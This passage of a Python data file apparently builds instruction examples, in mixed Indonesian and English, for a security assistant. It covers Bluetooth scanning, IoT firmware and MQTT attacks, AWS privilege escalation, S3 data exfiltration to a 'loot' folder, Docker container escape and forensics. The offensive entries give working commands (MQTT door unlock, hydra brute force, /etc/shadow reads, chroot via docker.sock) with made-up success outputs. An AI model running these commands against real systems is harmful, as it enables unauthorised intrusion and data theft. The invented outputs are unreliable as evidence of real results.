        "ubertooth-btle -f -c output.pcap"],
       [("hcitool", "Bluetooth device discovery"),
        ("btscanner", "Bluetooth scanning"),
        ("ubertooth", "Bluetooth sniffing")],
       "Bluetooth assessment perlu specialized hardware (BT adapter, Ubertooth untuk BLE sniff)",
       "BT security: pairing mode (legacy vs SSP), encryption, authentication, BLE vs BR/EDR",
       "technical",
       "Bluetooth scan found 7 devices. 2 in discoverable mode. 1 phone with legacy pairing (BIAS possible)."),
]

IOT_DATA = [
    _e("Lakukan firmware extraction dan analysis pada IoT device",
       ["firmware extraction: UART, JTAG, SPI flash dump, atau download dari vendor",
        "binwalk untuk extract filesystem dari firmware binary",
        "analisis: hardcoded creds, backdoors, vulnerable binaries, debug interfaces"],
       ["obtain firmware", "extract dengan binwalk", "analyze filesystem", "find vulnerabilities"],
       ["# Download firmware dari vendor",
        "wget https://vendor.com/firmware/device_v1.2.3.bin",
        "# Extract dengan binwalk",
        "binwalk -e device_v1.2.3.bin",
        "cd _device_v1.2.3.bin.extracted",
        "# Cari credentials",
        "grep -r 'password\\|passwd\\|secret' squashfs-root/etc/ 2>/dev/null",
        "cat squashfs-root/etc/shadow",
        "# Cari private keys",
        "find squashfs-root -name '*.pem' -o -name '*.key' -o -name 'id_rsa'",
        "# Strings pada binary",
        "strings squashfs-root/usr/bin/httpd | grep -E 'admin|password|backdoor'",
        "# Check untuk debug interfaces",
        "grep -r 'telnet\\|debug\\|uart' squashfs-root/etc/init*"],
       [("binwalk", "firmware extraction dan analysis"),
        ("strings", "extract readable strings dari binaries")],
       "Firmware analysis sering reveal hardcoded creds, private keys, dan undocumented backdoors",
       "Common IoT vulns: hardcoded creds, telnet enabled, unsigned firmware, insecure update mechanism",
       "professional",
       "Firmware extracted. Found: root:admin123 in /etc/shadow, SSH private key, Telnet enabled in init.d"),

    _e("Lakukan security assessment pada MQTT broker IoT",
       ["MQTT adalah lightweight messaging protocol populer di IoT",
        "default: no authentication, no TLS, semua client bisa subscribe ke semua topics",
        "attack: subscribe ke # (all topics), publish malicious commands"],
       ["check authentication", "enumerate topics", "subscribe to all", "publish test commands"],
       ["# Check unauthenticated access",
        "mosquitto_pub -h target.com -p 1883 -t 'test' -m 'ping' -d",
        "# Subscribe ke semua topics",
        "mosquitto_sub -h target.com -p 1883 -t '#' -v",
        "# Subscribe ke specific topics",
        "mosquitto_sub -h target.com -p 1883 -t 'home/+/temperature' -v",
        "mosquitto_sub -h target.com -p 1883 -t 'factory/+/command' -v",
        "# Publish command ke device",
        "mosquitto_pub -h target.com -p 1883 -t 'home/door/command' -m 'UNLOCK'",
        "# MQTT brute force",
        "hydra -L users.txt -P passwords.txt mqtt://target.com"],
       [("mosquitto_clients", "MQTT subscribe dan publish"),
        ("hydra", "MQTT authentication brute force")],
       "MQTT unauthenticated = subscribe ke semua sensor data dan publish arbitrary commands",
       "MQTT security: enable authentication, TLS, ACL per topic, disable anonymous access",
       "technical",
       "MQTT no auth. Subscribed to #: 234 topics. Factory floor sensor data exposed. Door unlock command works!"),
]

CLOUD_DATA = [
    _e("Lakukan privilege escalation di AWS menggunakan IAM misconfiguration",
       ["AWS IAM privesc via overprivileged roles dan policies",
        "common paths: iam:PassRole + ec2:RunInstances, lambda:UpdateFunction, sts:AssumeRole",
        "tools: pacu, enumerate-iam, pmapper"],
       ["enumerate IAM permissions", "identify privesc paths", "exploit best path", "gain admin"],
       ["# Enumerate current permissions",
        "aws iam get-user",
        "aws iam list-attached-user-policies --user-name current-user",
        "aws iam list-user-policies --user-name current-user",
        "# Enumerate dengan enumerate-iam",
        "python3 enumerate-iam.py --access-key AKIA... --secret-key xxx",
        "# Find privesc paths dengan pmapper",
        "python3 pmapper.py --profile target graph create",
        "python3 pmapper.py --profile target analysis --find-risks",
        "# Exploit PassRole + RunInstances",
        "aws ec2 run-instances --image-id ami-xxx --instance-type t2.micro --iam-instance-profile Name=AdminRole"],
       [("pacu", "AWS exploitation framework"),
        ("enumerate_iam", "AWS IAM permission enumeration"),
        ("pmapper", "AWS IAM privilege escalation finder")],
       "AWS privesc most common: iam:PassRole + ec2:RunInstances = create EC2 with admin role",
       "AWS privesc paths: PassRole+EC2, UpdateFunction (Lambda), CreateJob (Glue), AssociateInstanceProfile",
       "analytical",
       "AWS privesc: current user has iam:PassRole + ec2:RunInstances. Created EC2 with AdminRole. Full account access."),

    _e("Lakukan S3 bucket enumeration dan data exfiltration",
       ["S3 misconfiguration adalah paling umum di AWS: public buckets, overpermissive ACL",
        "enumerate: nama bucket dari DNS, certificate transparency, brute force",
        "data: backup files, configs, credentials, source code"],
       ["enumerate buckets", "check public access", "list contents", "exfiltrate sensitive data"],
       ["# Enumerate bucket names",
        "# Via DNS: target-backup.s3.amazonaws.com",
        "# Via CT logs: crt.sh untuk subdomain hints",
        "# Test public access",
        "aws s3 ls s3://target-backup --no-sign-request",
        "aws s3 ls s3://target-dev-files --no-sign-request",
        "# Download semua files",
        "aws s3 sync s3://target-backup /tmp/loot/ --no-sign-request",
        "# Scan untuk secrets",
        "trufflehog s3 --bucket target-backup --no-verification",
        "# Check bucket policy",
        "aws s3api get-bucket-acl --bucket target-backup --no-sign-request",
        "aws s3api get-bucket-policy --bucket target-backup --no-sign-request"],
       [("aws_cli", "S3 bucket enumeration dan access"),
        ("trufflehog", "secret scanning di S3")],
       "S3 public bucket: selalu cek dengan --no-sign-request. trufflehog untuk auto-detect secrets",
       "S3 sensitive files: terraform.tfstate (has all credentials!), .env, backup.sql, config.json",
       "professional",
       "S3 public bucket found: target-backup. Contains terraform.tfstate with RDS password, API keys. Critical."),

    _e("Lakukan container escape dari Docker privileged container",
       ["privileged container = full access ke host via /dev, capabilities, namespaces",
        "escape methods: nsenter ke host PID 1, mount host filesystem, cgroup release_agent",
        "juga check: Docker socket mount, hostPath mounts"],
       ["check container privileges", "identify escape vector", "execute escape", "access host"],
       ["# Check jika running privileged",
        "cat /proc/self/status | grep CapEff",
        "# Jika full capabilities: CapEff: 0000003fffffffff",
        "# Mount host filesystem",
        "mkdir /tmp/host && mount /dev/sda1 /tmp/host",
        "chroot /tmp/host",
        "# Nsenter ke host namespace",
        "nsenter --mount=/proc/1/ns/mnt -- /bin/bash",
        "# Via Docker socket (jika mounted)",
        "ls /var/run/docker.sock",
        "docker run -v /:/host -it alpine chroot /host /bin/bash",
        "# Cgroup release_agent method",
        "# More complex but works without socket"],
       [("nsenter", "namespace entry untuk container escape"),
        ("docker", "container management untuk escape via socket")],
       "Privileged container = root on host effectively. Docker socket mount = same impact",
       "Container escape indicators: CapEff full, /dev/* accessible, /proc/1 accessible, docker.sock",
       "technical",
       "Container escape: privileged mode confirmed via CapEff. nsenter to host PID 1. Full host access."),
]

FORENSICS_DATA = [
    _e("Lakukan memory forensics menggunakan Volatility3",
       ["Volatility3 adalah framework untuk analisis memory dump",
        "plugins: pslist, pstree, netscan, malfind, cmdline, dlllist",
        "workflow: imageinfo → pslist → netscan → malfind → dump suspicious process"],
       ["acquire memory", "identify OS profile", "list processes", "check network", "find malware"],
       ["# Identify OS",
        "vol -f memory.raw windows.info",
        "# Process list",
        "vol -f memory.raw windows.pslist.PsList",
        "vol -f memory.raw windows.pstree.PsTree",
        "# Network connections",
        "vol -f memory.raw windows.netscan.NetScan",
        "# Suspicious memory regions (injected code)",
        "vol -f memory.raw windows.malfind.MalFind",
        "# Command line history",
        "vol -f memory.raw windows.cmdline.CmdLine",
        "# Dump suspicious process",
        "vol -f memory.raw windows.dumpfiles.DumpFiles --pid 1234",
        "# Extract strings dari process memory",
        "vol -f memory.raw windows.strings --pid 1234"],
       [("volatility3", "memory forensics framework")],
       "Volatility3 key plugins: pslist (processes), netscan (connections), malfind (injected code)",
       "Malfind output: MZ header di unexpected region = potential code injection. Dump dan analyze",
       "analytical",
       "Memory forensics: svchost.exe PID 3421 has injected code (malfind). C2 connection to 185.x.x.x:443."),

    _e("Lakukan disk forensics dan file recovery dengan Autopsy",
       ["Autopsy adalah GUI forensics tool untuk disk image analysis",
        "features: file recovery, timeline analysis, keyword search, artifact extraction",
        "berguna untuk: incident investigation, data recovery, legal cases"],
       ["acquire disk image", "create Autopsy case", "analyze artifacts", "generate report"],
       ["# Acquire disk image",
        "dd if=/dev/sda of=/external/disk.img bs=512 conv=noerror,sync status=progress",
        "# Verify integrity",
        "md5sum /dev/sda > disk.md5",
        "md5sum /external/disk.img >> disk.md5",
        "diff disk.md5",
        "# Run Autopsy",
        "autopsy &",
        "# Command line: The Sleuth Kit",
        "fls -r /external/disk.img | grep -i password",
        "icat /external/disk.img <inode> > recovered_file",
        "# Timeline creation",
        "mactime -b disk.bodyfile -d > timeline.csv"],
       [("autopsy", "GUI disk forensics"),
        ("sleuthkit", "command-line disk forensics tools")],
       "dd untuk bit-exact copy. Verify dengan MD5/SHA256. Never work on original — always on image",
       "Autopsy artifacts: recent documents, web history, USB devices, installed programs, user activity",
       "professional",
       "Disk forensics: 234 deleted files recovered. Malware dropper found in %TEMP%. Timeline shows D-7 activity."),

    _e("Lakukan Windows event log analysis untuk incident timeline",
       ["Windows Event Logs mengandung rich forensics data",
        "key logs: Security (4624,4625,4648,4672,4769), System (7045), Application",
        "tools: hayabusa untuk fast timeline, chainsaw untuk hunting"],
       ["collect logs", "run hayabusa timeline", "hunt specific events", "build attack timeline"],
       ["# Hayabusa timeline dari logs",
        "hayabusa csv-timeline -d C:\\Windows\\System32\\winevt\\Logs -o timeline.csv",
        "hayabusa json-timeline -d C:\\Windows\\System32\\winevt\\Logs -o timeline.json",
        "# Chainsaw hunting",
        "chainsaw hunt C:\\Windows\\System32\\winevt\\Logs --sigma rules/ --mapping mappings/sigma-event-logs-all.yml",
        "# Manual event queries",
        "wevtutil qe Security /q:*[System[(EventID=4624)]] /f:text /c:50",
        "# PowerShell",
        "Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4624} | Select-Object -First 20 | Format-List"],
       [("hayabusa", "fast Windows event log timeline"),
        ("chainsaw", "Windows log hunting dengan Sigma rules")],
       "Hayabusa menghasilkan color-coded CSV timeline yang mudah dianalisis di Excel/Timeline Explorer",
       "Key EventIDs: 4624 (logon), 4625 (failed), 4648 (explicit creds), 4769 (Kerberos), 7045 (new service)",
       "technical",
       "Event log analysis: attack started 14:23. 4769 (Kerberoast) → 4624 NTLM (PTH) → 7045 PSEXESVC service."),

    _e("Lakukan network forensics dari PCAP file",
       ["PCAP analysis untuk reconstruct network activity selama incident",
        "tools: Wireshark untuk GUI, tshark untuk command-line, zeek untuk log generation",
        "extract: credentials, files, C2 communication, lateral movement evidence"],
       ["open PCAP", "filter traffic of interest", "extract files", "identify C2", "document findings"],
       ["# Zeek untuk generate logs dari PCAP",
        "zeek -r incident.pcap local",
        "# Tshark untuk extract specific data",
        "tshark -r incident.pcap -Y 'http.request' -T fields -e ip.src -e http.host -e http.uri",
        "# Extract files dari PCAP",
        "tshark -r incident.pcap --export-objects http,/tmp/extracted_files/",
        "# Find credentials",
        "tshark -r incident.pcap -Y 'ftp || telnet || http.authbasic' -T text",
        "# Detect beaconing",
        "tshark -r incident.pcap -Y 'tcp.flags.syn==1 && tcp.flags.ack==0' -T fields -e ip.dst -e frame.time | sort | uniq -c | sort -rn",
        "# DNS exfiltration detection",
        "tshark -r incident.pcap -Y dns -T fields -e dns.qry.name | awk '{print length, $0}' | sort -rn | head -20"],
       [("wireshark", "GUI PCAP analysis"),
        ("tshark", "command-line PCAP analysis"),
        ("zeek", "PCAP ke structured logs")],
       "Zeek dari PCAP = structured logs yang mudah di-grep. tshark untuk targeted extraction",
       "PCAP forensics: filter by IP, extract files, find cleartext creds, detect C2 beacon patterns",
       "analytical",
       "PCAP analysis: C2 beacon every 30s to 185.x.x.x. Extracted malware dropper from HTTP. Creds in FTP."),
]

# Gabungkan semua data part 5
EXTRA_DATA = (
    OSINT_DATA +
    OFFENSE_DATA +
    DEFENSE_DATA +
    SCAN_DATA +
    POST_EXPLOIT_DATA +
    WIRELESS_DATA +
    IOT_DATA +
    CLOUD_DATA +
    FORENSICS_DATA
)
